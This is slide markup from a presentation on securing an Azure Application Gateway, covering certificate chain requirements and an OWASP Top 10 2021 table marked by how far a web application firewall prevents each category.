          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE111463-C422-E522-3846-670DE5523A54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The certificate on the listener requires the entire certificate chain to be uploaded (the root certificate from the CA, the intermediates and the leaf certificate) to establish the chain of trust.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application gateway doesn't provide any capability to create a new certificate or send a certificate request to a certification authority.</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textfeld 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{179BE2EA-EEBB-5CA1-1E28-AD392BE8B698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998982" y="6349805"/>
            <a:ext cx="6094476" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/azure/application-gateway/ssl-overview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Grafik 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5042FF71-4BF2-A4E0-CE62-B1C9AA7F80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36608" y="857983"/>
            <a:ext cx="1161287" cy="1161287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4069573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F7842D-65AB-826B-7B12-090DCC084244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069646" y="1092848"/>
            <a:ext cx="9958753" cy="680144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" cap="all" dirty="0"/>
              <a:t>Protecting our System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C70825-A395-E900-1048-AD4148407910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2261973" y="2317765"/>
            <a:ext cx="5846441" cy="3862619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135702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22">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24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE54A2A-DF49-4800-82E7-3AF9353F8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96125ED7-F0CF-40D9-8C60-51E188053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adlock on computer motherboard">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B03258-E41A-B35F-7F9E-FEA8F4DBE8DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="email">
            <a:alphaModFix amt="60000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191979" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFF93C3-72E4-21AD-6420-6AD8BB219FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052146" y="1077626"/>
            <a:ext cx="9958754" cy="3317443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2F51AF8-6152-CCD3-ABC0-609F1A52A8BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4572000"/>
            <a:ext cx="9257512" cy="1263047"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Connector 28">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38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099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8C29F9-954C-32B2-B2AD-75496AB78BD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>OWASP Top 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48EC617D-B4C8-00B6-883E-A7CA56D750A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180402" y="6208611"/>
            <a:ext cx="6096000" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Tabelle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{464AAB0A-1DA5-E2A1-7150-061BA9B7DE06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1180402" y="1899761"/>
          <a:ext cx="9265538" cy="4079240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{93296810-A885-4BE3-A3E7-6D5BEEA58F35}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7225963">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="915948704"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2039575">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3372213257"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>2021</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>Diff </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>to</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> 2017</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4025773468"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A01:2021-Broken Access Control</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>▲</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> +4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3193931380"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A02:2021-Cryptographic </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>Failures</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH"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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>▲</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> +1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="641348936"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A03:2021-Injection</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>▼</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> -2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="787323402"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A04:2021-Insecure Design</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>New</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2726415662"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A05:2021-Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH"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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>▲</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> +1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="101525378"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A06:2021-Vulnerable and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>Outdated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> Components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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>▲</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> +3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4033131197"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A07:2021-Identification and Authentication </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>Failures</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH"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solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>▼</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> -5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1935079780"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A08:2021-Software and Data Integrity </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>Failures</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>New</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="719680095"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A09:2021-Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> and Monitoring </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>Failures</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-CH"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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>▲</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> +1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1333007410"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t>A10:2021-Server-Side Request </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0" err="1"/>
                        <a:t>Forgery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-CH" dirty="0"/>
                        <a:t> (SSRF)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solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>New</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="464836408"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Ellipse 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4E3A48A-16ED-7CF2-6D6A-6BF619EC512A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10583227" y="2269126"/>
            <a:ext cx="282527" cy="2825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Ellipse 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B27B90DC-BDF3-39DF-DFA2-7B6EC82C7950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10591086" y="3023506"/>
            <a:ext cx="282527" cy="282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Ellipse 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1838597D-08CB-864E-45F3-C83513A97B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10591086" y="2646316"/>
            <a:ext cx="282527" cy="282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Textfeld 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46221915-5F78-60A6-75E6-2894DB31FF7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5537869" y="6194680"/>
            <a:ext cx="1882106" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Preventable by WAF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Ellipse 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13C3D4F8-94CA-EFD4-F1E8-84E2F6680300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5199936" y="6210405"/>
            <a:ext cx="282527" cy="282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Textfeld 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43C5000D-C01D-31C8-C930-B7E5BA842A23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987445" y="6167393"/>
            <a:ext cx="2690080" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Partially preventable by WAF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Ellipse 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA1C99F2-F9C8-6C2A-3063-59B9588175B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7649512" y="6183118"/>
            <a:ext cx="282527" cy="2825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Ellipse 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B95C5E6A-DF0B-7C92-7768-C7D8263C3C99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10591086" y="4134669"/>
            <a:ext cx="282527" cy="2825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 name="Ellipse 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82C900B2-83D5-8574-02A3-708A15477F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
